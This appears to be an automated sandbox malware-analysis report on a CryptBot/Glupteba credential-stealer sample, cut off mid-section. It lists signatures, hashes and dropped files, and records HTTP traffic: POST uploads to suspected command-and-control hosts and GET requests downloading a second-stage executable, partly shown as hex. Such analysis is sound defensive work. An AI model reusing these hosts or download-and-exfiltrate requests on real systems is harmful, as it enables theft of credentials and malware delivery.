Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.24453.7436

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetect.malware1.24453.7436 (renamed file extension from 7436 to exe)
Analysis ID: 385467
MD5: 5e3189812e802c0fd68ce592cb1e1999
SHA1: 38552111d3001f4998ab85408601873897653360
SHA256: f42553b4409992bbddc1df8b716596727762a191055cd2eebb3ced648cf5384f
Tags: CryptBot
Infos:

Most interesting Screenshot:

Detection

Cryptbot Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
Yara detected Glupteba
Contains functionality to register a low level keyboard hook
Delayed program exit found
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: awumad01.top Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\Murano.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe ReversingLabs: Detection: 14%
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Virustotal: Detection: 30% Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe ReversingLabs: Detection: 33%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00401270 GetFileAttributesW,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle, 0_2_00401270
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040410E CryptUnprotectData,CryptUnprotectData, 0_2_0040410E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040426D CryptUnprotectData,CryptUnprotectData, 0_2_0040426D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00401470 CryptUnprotectData,LocalFree, 0_2_00401470
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00404400 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,CryptUnprotectData, 0_2_00404400
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040365A ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData, 0_2_0040365A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00403600 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData, 0_2_00403600

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Unpacked PE file: 16.2.4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW, 0_2_00414650
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_0041469B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW, 0_2_00416AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_00416C3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F259
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406301 FindFirstFileW,FindClose, 13_2_00406301
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 13_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040F64C FindFirstFileExW, 16_2_0040F64C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5F89C FindFirstFileExW, 16_2_03F5F89C
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime, 18_2_00403117
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose, 18_2_00408FA7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 18_2_00402A0B
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW, 18_2_00402B28
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040F64C FindFirstFileExW, 22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0F89C FindFirstFileExW, 22_2_05A0F89C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040F64C FindFirstFileExW, 25_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DF89C FindFirstFileExW, 25_2_059DF89C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 13:12:19 GMTServer: Apache/2.2.22 (@RELEASE@)Last-Modified: Mon, 12 Apr 2021 02:46:58 GMTETag: "320648-132ebb-5bfbd8703eb96"Accept-Ranges: bytesContent-Length: 1257147Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 e0 16 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 e8 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e8 c9 00 00 00 00 16 00 00 ca 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 d0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: aufsvg12.topContent-Length: 67238Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------pwDccphxPeFIadjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: mardeq01.topContent-Length: 67223Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040C561 Sleep,Sleep,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,ExitProcess,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,ShellExecuteW,ExitProcess, 0_2_0040C561
Source: global traffic HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: aufsvg12.top
Source: unknown HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: aufsvg12.topContent-Length: 67238Cache-Control: no-cache
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp String found in binary or memory: http://aufsvg12.top/index.php
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp String found in binary or memory: http://aufsvg12.top/index.php)
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp String found in binary or memory: http://aufsvg12.top/index.phpz
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/downfiles/lv.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/downfiles/lv.exeaC:
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exeopenBOOLEANBIT
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exeqEaRrk
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exeskQ
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmp String found in binary or memory: http://mardeq01.top/index.php
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377165659.0000000005CD9000.00000004.00000001.sdmp, Murano.exe, 0000000D.00000000.381399655.0000000000409000.00000002.00020000.sdmp, Murano.exe.0.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://www.avast.com0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://www.avast.com0/
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377605522.0000000005CD2000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Notti.eps.18.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_004082E1 SetWindowsHookExW 00000002,Function_000082B3,00000000,00000000 18_2_004082E1
Contains functionality for read data from the clipboard
